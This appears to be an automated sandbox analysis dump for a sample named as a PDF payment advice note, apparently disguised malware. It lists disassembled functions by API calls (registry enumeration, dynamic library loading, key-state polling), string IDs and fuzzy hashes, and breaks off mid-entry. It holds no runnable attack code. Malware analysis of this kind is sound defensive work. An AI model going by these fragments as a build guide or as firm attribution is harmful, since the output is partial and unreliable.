                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: 52ed864028ad89bbf368f0a8a5ca3692ff959d2dab06145831dd4cf30aa4de52
                                                              • Instruction ID: 9290f2ed88d23bce5de01eb4342f83674c31baaa10aaeec74384aeb2f4cb0138
                                                              • Opcode Fuzzy Hash: 52ed864028ad89bbf368f0a8a5ca3692ff959d2dab06145831dd4cf30aa4de52
                                                              • Instruction Fuzzy Hash: 81217971200209ABEF148F64DC84FBA37BDFF58328F104639FA10D2191E631DC61A764
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 008A6DBC
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008A6DEF
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 008A6E01
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008A6E3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 498d76c88161d4a0b970fe8e509ca351b1b3fe1c306d7e8e2cc7d8873973ac25
                                                              • Instruction ID: 10cc8a374531916fc86ecd7d20efeaa5c42161b284ad82483a3094043a7d9051
                                                              • Opcode Fuzzy Hash: 498d76c88161d4a0b970fe8e509ca351b1b3fe1c306d7e8e2cc7d8873973ac25
                                                              • Instruction Fuzzy Hash: 8D21A474600209ABEB209F39DC04A9A77F5FF46760F244619FEA0D76D4E7719970CB50
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 008A6E89
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008A6EBB
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 008A6ECC
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008A6F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: c6d8c00697046872a6af4f97f990b918bc6acb11af4d308d24d61acd231a19c6
                                                              • Instruction ID: db97613ad7e94e168489b1cf35e57f0f2c399bf7d3ac97fcab95893bcdd87e50
                                                              • Opcode Fuzzy Hash: c6d8c00697046872a6af4f97f990b918bc6acb11af4d308d24d61acd231a19c6
                                                              • Instruction Fuzzy Hash: 06218179500305EBEB209F69D804A9AB7A8FF46724F380A19F9A0D76D4E77098708761
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AAC54
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008AACA8
                                                              • __swprintf.LIBCMT ref: 008AACC1
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,008CF910), ref: 008AACFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: dee840ec1081f5b15c803ea7712fb7f607867448aaa84e44c88fd1f9608fc7f7
                                                              • Instruction ID: 870bbfa04497d30a8cff13ea4d15cdebe9689b574fa8d5d21ea729ebeae91a5b
                                                              • Opcode Fuzzy Hash: dee840ec1081f5b15c803ea7712fb7f607867448aaa84e44c88fd1f9608fc7f7
                                                              • Instruction Fuzzy Hash: 65216030A0010DAFDB10DF69C945DAE7BB8FF49714B004469F909EB352DB31EA41CB22
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 008A1B19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: d29c6ebda95cdd9d4ec7431c0c07f06855e2241a92c71d9040746923e5b88c5a
                                                              • Instruction ID: 55b1694c859ab9f79a3ca1e03d8d37dd212c7dd07c9e8f124de028bb76d507aa
                                                              • Opcode Fuzzy Hash: d29c6ebda95cdd9d4ec7431c0c07f06855e2241a92c71d9040746923e5b88c5a
                                                              • Instruction Fuzzy Hash: 5C117C709001188FCF00EFA8D8558BEB7B5FF26304F104465D964E76A2EB32590ACF50
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008BEC07
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008BEC37
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008BED6A
                                                              • CloseHandle.KERNEL32(?), ref: 008BEDEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: f04a7c8a926d66a98f9638ab005c16c5a347acf8a07e3a572047364f2a63bd45
                                                              • Instruction ID: c5e5b8ad81b2382442d1d7388d76e42b5855be186759de863496342e1757b160
                                                              • Opcode Fuzzy Hash: f04a7c8a926d66a98f9638ab005c16c5a347acf8a07e3a572047364f2a63bd45
                                                              • Instruction Fuzzy Hash: 15812C716047109FD760EF2CC886B6AB7E5FF44720F14892DF999DB392D6B1AC408B92
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1559183368-0
                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction ID: fc5e9589622005f3e27cb2e0344677f34adcaed12d685c6d462084afced34a8b
                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction Fuzzy Hash: 5A51D670A00B09DBCB248F69D88966E77A2FF40335F258769F836D62D0DB71DD908B45
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C00FD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C013C
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008C0183
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 008C01AF
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C01BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                              • String ID:
                                                              • API String ID: 3440857362-0
                                                              • Opcode ID: b9a0cfeaca609ba0d616c2733fb3b2abc81b31f06bd07403b25ec7d496a67162
                                                              • Instruction ID: 6e02fd3d2e1c235135368bb9e5becc2ccec2e10146e68fc266b270bd696f9166
                                                              • Opcode Fuzzy Hash: b9a0cfeaca609ba0d616c2733fb3b2abc81b31f06bd07403b25ec7d496a67162
                                                              • Instruction Fuzzy Hash: 24511771208208AFD714EB58C881F6AB7F9FF84754F44892DF595C72A2EB31E904CB52
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008BD927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008BD9AA
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 008BD9C6
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008BDA07
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008BDA21
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: d46df4dca2355ccb315de48567d19aa4efa20b823593e7d33cf5e58ceb64331f
                                                              • Instruction ID: 33fad2077947842605c1f6c697a631550dcd9782199900fbc26a6d955e52a438
                                                              • Opcode Fuzzy Hash: d46df4dca2355ccb315de48567d19aa4efa20b823593e7d33cf5e58ceb64331f
                                                              • Instruction Fuzzy Hash: BB511635A00219EFCB11EFA8C4849ADBBF5FF09324B148066E959EB312E731AD45CF91
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008AE61F
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008AE648
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008AE687
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008AE6AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008AE6B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 6302d0fa2c8b7421476d0b1314a13d305828baeda79e4999552e3f9374649552
                                                              • Instruction ID: 0188573f798bbf5e68e25f7afccc48cb6666bbac54f0a0bd33a5c380a361320e
                                                              • Opcode Fuzzy Hash: 6302d0fa2c8b7421476d0b1314a13d305828baeda79e4999552e3f9374649552
                                                              • Instruction Fuzzy Hash: B1511835A00109DFDB11EF68C981AAEBBF5FF49314B1484A9E949EB362CB31ED11CB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b854e73b2d3b8636c9e2b31301038af7be7950101795d1994efee96d236b230
                                                              • Instruction ID: 2b10d5e3cb1ebcacec7993d49e6dc5bbdf9853c99931f4b0bc5eb6ba6aa7f18f
                                                              • Opcode Fuzzy Hash: 4b854e73b2d3b8636c9e2b31301038af7be7950101795d1994efee96d236b230
                                                              • Instruction Fuzzy Hash: C041023590410CAFD728CB28DC88FA9BBB9FB09318F19416AF916E72E1CB30DD40DA51
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00842357
                                                              • ScreenToClient.USER32(009057B0,?), ref: 00842374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00842399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 008423A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: ccc5a33600f9fcfdaa557486f1cabb8ee34e4534fb966f3893eec5446659b29c
                                                              • Instruction ID: 640fe880eb2b8a176c6909d4b692222d64b4c5e5906d3200f13c245e586efa16
                                                              • Opcode Fuzzy Hash: ccc5a33600f9fcfdaa557486f1cabb8ee34e4534fb966f3893eec5446659b29c
                                                              • Instruction Fuzzy Hash: 5E419135608509FBDF159F68C844FE9BB75FB05364F20836AF828D62A0CB349990DF91
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008963E7
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00896433
                                                              • TranslateMessage.USER32(?), ref: 0089645C
                                                              • DispatchMessageW.USER32(?), ref: 00896466
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00896475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: 3e722f454d56c754b9e7c6b10c2bf36094d4a3dba03dfc4cb5ce6a7cca10b574
                                                              • Instruction ID: 7c5983f8f3dafee36cdcf64307d2d331d2cce072d65d1376a8c4163927e59150
                                                              • Opcode Fuzzy Hash: 3e722f454d56c754b9e7c6b10c2bf36094d4a3dba03dfc4cb5ce6a7cca10b574
                                                              • Instruction Fuzzy Hash: CC31DE31904606AFEF24AFB48C44FB77BBCFB00304F184165E821C21A1F73598A9EBA5
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00898A30
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00898ADA
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00898AE2
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00898AF0
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00898AF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 824fb21f3b020742c5f526d6953ee5b59f1aa6ac6c366d709d1573e9e629e3aa
                                                              • Instruction ID: caede88775f9c1bf124bca95ec75291111d239919c5fb97d9e5d704f84fa8c06
                                                              • Opcode Fuzzy Hash: 824fb21f3b020742c5f526d6953ee5b59f1aa6ac6c366d709d1573e9e629e3aa
                                                              • Instruction Fuzzy Hash: 8F31DF7150022AEFDF14DFA8DD4CA9E3BB6FB05325F14822AF925E62D1C7B09910DB91
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0089B204
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0089B221
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0089B259
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0089B27F
                                                              • _wcsstr.LIBCMT ref: 0089B289
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: c62d5ea0ae21e68fc166656ba6e9eb519557cf9580dfaeb9a4c4f842b1a4fe1e
                                                              • Instruction ID: 23162dfbac01f0e9a4d4a1f80fb593f20b2b3801644dcefea4acbde476f83087
                                                              • Opcode Fuzzy Hash: c62d5ea0ae21e68fc166656ba6e9eb519557cf9580dfaeb9a4c4f842b1a4fe1e
                                                              • Instruction Fuzzy Hash: 832125312042047AEF156BB9AD09E7F7BA9FF49720F044139F804CA1A1EB71DC409660
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CB192
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 008CB1B7
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008CB1CF
                                                              • GetSystemMetrics.USER32(00000004), ref: 008CB1F8
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008B0E90,00000000), ref: 008CB216
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: cc518b5e8678806df0feef995b330232cec33959978d281e1eb0ae1010febc54
                                                              • Instruction ID: 058c761f5359c762f05319b1b448465e02845d6e46f05ff0552a769e8cd80ecc
                                                              • Opcode Fuzzy Hash: cc518b5e8678806df0feef995b330232cec33959978d281e1eb0ae1010febc54
                                                              • Instruction Fuzzy Hash: AF217C71A24A65AFCB209F389C09F6A3BB5FB05325F154629BE22D71E0E730D8109B90
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00899320
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00899352
                                                              • __itow.LIBCMT ref: 0089936A
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00899392
                                                              • __itow.LIBCMT ref: 008993A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow$_memmove
                                                              • String ID:
